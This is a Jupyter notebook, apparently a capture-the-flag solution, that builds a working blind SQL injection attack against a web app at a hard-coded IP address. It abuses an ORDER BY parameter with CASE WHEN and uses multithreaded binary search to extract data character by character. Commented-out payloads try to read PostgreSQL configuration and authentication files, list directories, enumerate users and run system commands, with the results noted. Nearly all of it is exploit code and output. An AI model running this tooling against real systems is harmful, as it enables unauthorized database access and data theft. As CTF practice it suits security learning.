In [1]:
import requests
import re
from bs4 import BeautifulSoup
import string
from IPython.core.display import display, HTML
import concurrent.futures
import functools
from collections import defaultdict

url = "http://200.136.213.109/"

In [2]:
def true_or_false(html):
    return html.index('Owl') < html.index('Fraga')

In [3]:
def request_sqli(query, char, compare='='):
    if isinstance(char, str):
        char = ord(char)
        
    data = {
#         "order" : f"""CASE WHEN (
#             SELECT ASCII(SUBSTRING(cast('id' AS text), %d, 1)) 
#             FROM solutions.bloodsuckers.models.Criminal 
#             WHERE age=55)%s%d THEN crime ELSE name END""" % (index, compare, char)
#         "order" : """CASE WHEN (
#         SELECT ASCII(SUBSTRING(column_name, %d, 1))
#         FROM information_schemav.columns
#         WHERE table_name  = 'Criminal' AND ROWNUM = 1)=%d THEN crime ELSE name END""" % (index, ord(char))
        # age- Frage
        # crime - Owl
        "order" : f"CASE WHEN ({query}){compare}{char} THEN crime ELSE name END"
    }

    response = requests.post(url, data=data)
    
    if 'Owl' not in response.text:
        raise Exception(response.text)
        
    result = true_or_false(response.text)    
    
    return result

In [4]:
def sqli_brute():
    for index in range(1, 100):
        for char in string.ascii_letters + string.digits:
#             print(f'DEBUG - Index: {index}, Char: {char}')
            if request_sqli(char, index):
                print(f'FOUND: Index: {index}, Char: {char}')

In [5]:
def binsearch(query, index, sl,sh):
    searchlow = sl
    searchhigh = sh
    searchmid = 0
    smallest_reached = False
    
    while True:
        searchmid = int((searchlow + searchhigh) / 2)
#         print(f"CURRENT SEARCH: {index} - {searchmid}")
        
        if request_sqli(query.format(index=index), searchmid, "="):
#             print(f"Found: {index} - {searchmid}")
            break
        elif request_sqli(query.format(index=index), searchmid, ">"):
#             print(f"BIGGER THAN: {index} - {searchmid}")
            searchlow = searchmid + 1
        elif request_sqli(query.format(index=index), searchmid, "<"):
#             print(f"SMALLER THAN: {index} - {searchmid}")
            searchhigh = searchmid
            
            if smallest_reached:
                return None
            elif searchmid == sl:
                smallest_reached = True
    
    return searchmid



def sqli_bin_search(query, min_val, max_val, max_index):
    # 32 - 126 - Ascii printable range
#     for index in range(1, max_index):
# #         print('Current index: ', index)
#         curr_char = binsearch(query, index, min_val, max_val)
#         if curr_char:
#             char = chr(curr_char)
#             yield char
#             print(f'FOUND: Index: {index}, Char: {char}')
#         else:
#             print("End of field.")
#             return
    index_chars = defaultdict(None)
    
    with concurrent.futures.ThreadPoolExecutor() as executer:
#         map_result = tuple(executer.map(binsearch, (query, range(1, max_index), min_val, max_val)))
        future_to_index = {executer.submit(binsearch, query, index, min_val, max_val): index for index in  range(1, max_index)}
    
        for future in concurrent.futures.as_completed(future_to_index):
            index = future_to_index[future]
            
            try:
                curr_char = future.result()
                
                if curr_char:
                    char = chr(curr_char)
                    print(f'FOUND: Index: {index}, Char: {char}')
                    index_chars[index] = char 
            except Exception as exc:
                print('%r generated an exception: %s' % (index, exc))
                
            else:
                print("Current index: ", index)

        
    return index_chars

In [6]:
query_len = """
            SELECT ASCII(SUBSTRING(cast(LENGTH(cast('id' AS text)) as text ), {index}, 1))
            FROM   solutions.bloodsuckers.models.Criminal 
            WHERE  age=55
            """
query_val = """
            SELECT ASCII(SUBSTRING(cast(id AS text), {index}, 1)) 
            FROM   solutions.bloodsuckers.models.Criminal 
            WHERE  age=55
            """

query_val = """
            SELECT ASCII(SUBSTRING(cast(id AS text), {index}, 1)) 
            FROM   solutions.bloodsuckers.models.Criminal 
            where id=1
            """

base_query = """
            SELECT ASCII(SUBSTRING(%s, {index}, 1)) 
            """

#     length = list(sqli_bin_search(query_len, 48, 57, 10))
#     print(length)
#     length = int(''.join(length))

In [44]:
base_query = """
            SELECT ASCII(SUBSTRING(%s, {index}, 1)) 
            FROM   Criminal
            WHERE id=1
            """

# base_query = """
#             SELECT %s
#             FROM   Criminal
#             WHERE id=1
#             """

# base_query = """
#             SELECT ASCII(SUBSTRING(%s, {index}, 1)) 
#             FROM   Flag
#             where id=1
#             """


# base_query = """
#             SELECT ASCI(
#                 SUBSTRING(string_agg(usename, ','), {index}, 1)) 
#             FROM   pg_user
#             """

# query_val = base_query % "USER" #dbuser
# query_val = base_query % "current_database()" #criminals
# query_val = base_query % "current_setting('data_directory')" #/var/lib/postgresql/data
# query_val = base_query % "" #/var/lib/postgresql/data
# query_val = base_query % "pg_read_file('global/pg_auth',0,10000000)"
# query_val = base_query % "(SELECT string_add(pg_read_file('global/pg_hba.conf',0,10000000), ','))"
# query_val = base_query % """(SELECT string_agg(c.relname, ',')
# FROM pg_catalog.pg_class c 
# LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace 
# WHERE c.relkind IN ('r','') AND n.nspname NOT IN ('pg_catalog', 'pg_toast') 
# AND pg_catalog.pg_table_is_visible(c.oid))""" #pg_catalog.pg_class is not mapped
# query_val = base_query % "(SELECT string_agg(username, ',') from pg_user)"  #pg_user is not mapped
# query_val = base_query % "(SELECT string_agg(datname, ',') FROM pg_database)"  #pg_database is not mapped 
# query_val = base_query % "current_setting('hba_file')" #/var/lib/postgresql/data/pg_hba.conf
# query_val = base_query % "(STRING_AGG(LOAD_FILE('/var/lib/postgresql/data/pg_hba.conf'), ','))" #load_file(unknown) does not exist
# query_val = base_query % "(SELECT string_agg(pg_read_file('pg_auth.conf',0,10000000), ','))" #
# query_val = base_query % "(SELECT USER)" #
# query_val = base_query % "string_agg(CAST(id as text), ',')" # get all ids from table, 1,2,3,4. there is nothing...
# query_val = base_query % "(SELECT string_agg(id,'') FROM pg_database)" #
# query_val = base_query % "current_user" #
# query_val = base_query % "(SELECT usename FROM pg_shadow)" #pg_shadow is not mapped 
# query_val = base_query % "CAST(inet_server_addr() as text)" #172.18.0.2/32 , tried to connect remotliy but without success
# query_val = base_query % "CAST(inet_server_port() as text)"  #5432
# query_val = base_query % "pg_read_file('pg_hba.conf')"  # # PostgreSQL Client Authentication Configuration File
# query_val = base_query % "pg_read_file('global/ph_auth')"  # "global/ph_auth": No such file or directory
# query_val = base_query % "pg_read_file('global/pg_database')"  #  ERROR: could not stat file "global/pg_database": No such file or directory
# query_val = base_query % "pg_read_file('global')"  #  could not read file "global": Is a directory
# query_val = base_query % "CAST(system('uptime') as text)"  #   ERROR: cannot accept a value of type internal
# query_val = base_query % "pg_read_file('hibernate.cfg.xml')"  #ERROR: could not stat file "global/hibernate.cfg.xml": No such file or directory
# query_val = base_query % "current_setting('port')"  #5432
# query_val = base_query % "current_setting('config_file')"  #/var/lib/postgresql/data/postgresql.conf
# query_val = base_query % "(cast(length(cast(pg_read_file('postgresql.conf') as text)), text)"  # ----------------------------- PostgreSQL configuration file
# query_val = base_query % "to_char(STRPOS(pg_read_file('postgresql.conf'), 'CTF'), '9999')"  # No data type for node
# query_val = base_query % "(string_agg(pg_ls_dir('.'),','))"  # No data type for node
# query_val = base_query % "STRPOS(pg_read_file('pg_hba.conf'), '')"  # No data type for node
# query_val = base_query % "(SELECT string_agg(id, ',') FROM Criminal)"  # No data type for node
# strpos('w3resource', 'w344')
# query_val = "create table file (line text)"


# request_sqli(query_val, 0)

# try:
#     result = sqli_bin_search(query_val, 0, 126, 10)
    
# #     print(''.join(word))
# except Exception as ex:
#     display(HTML(str(ex)))
    

In [250]:
# list columns
# SELECT relname, A.attname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T WHERE (C.relkind='r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE 'public')

In [251]:
# list dbs
# SELECT datname FROM pg_database

# current user
# select user

# list users
# SELECT usename FROM pg_user


In [45]:
''.join(['P', 'o', 's', 't', 'g', 'r', 'e', 'S', 'Q', 'L', ' ', '9', '.', '6', '.', '5', ' ', 'o', 'n', ' ', 'x', '8', '6', '_', '6', '4', '-', 'p', 'c', '-', 'l', 'i', 'n', 'u', 'x', '-', 'g', 'n', 'u', ',', ' ', 'c', 'o', 'm', 'p', 'i', 'l', 'e', 'd', ' ', 'b', 'y', ' ', 'g', 'c', 'c', ' ', '(', 'D', 'e', 'b', 'i', 'a', 'n', ' ', '4', '.', '9', '.', '2', '-', '1', '0', ')', ' ', '4', '.', '9', '.', '2', ',', ' ', '6', '4', '-', 'b', 'i', 't'])

'PostgreSQL 9.6.5 on x86_64-pc-linux-gnu, compiled by gcc (Debian 4.9.2-10) 4.9.2, 64-bit'

In [50]:
"""SELECT c from solutions.bloodsuckers.models.Criminal c WHERE (c.name like :pName or :pNameLength = 0) and (c.age = :pAge or :pAge = 0) and (c.crime like :pCrime or :pCrimeLength = 0) order by CASE WHEN (
            SELECT ASCII(SUBSTRING((select string_agg(pg_ls_dir, ',') from pg_ls_dir('.')), 1, 1)) 
            FROM   Criminal
            )=63 THEN crime ELSE name END]""".splitlines()[1][75:]

"pg_ls_dir('.')), 1, 1)) "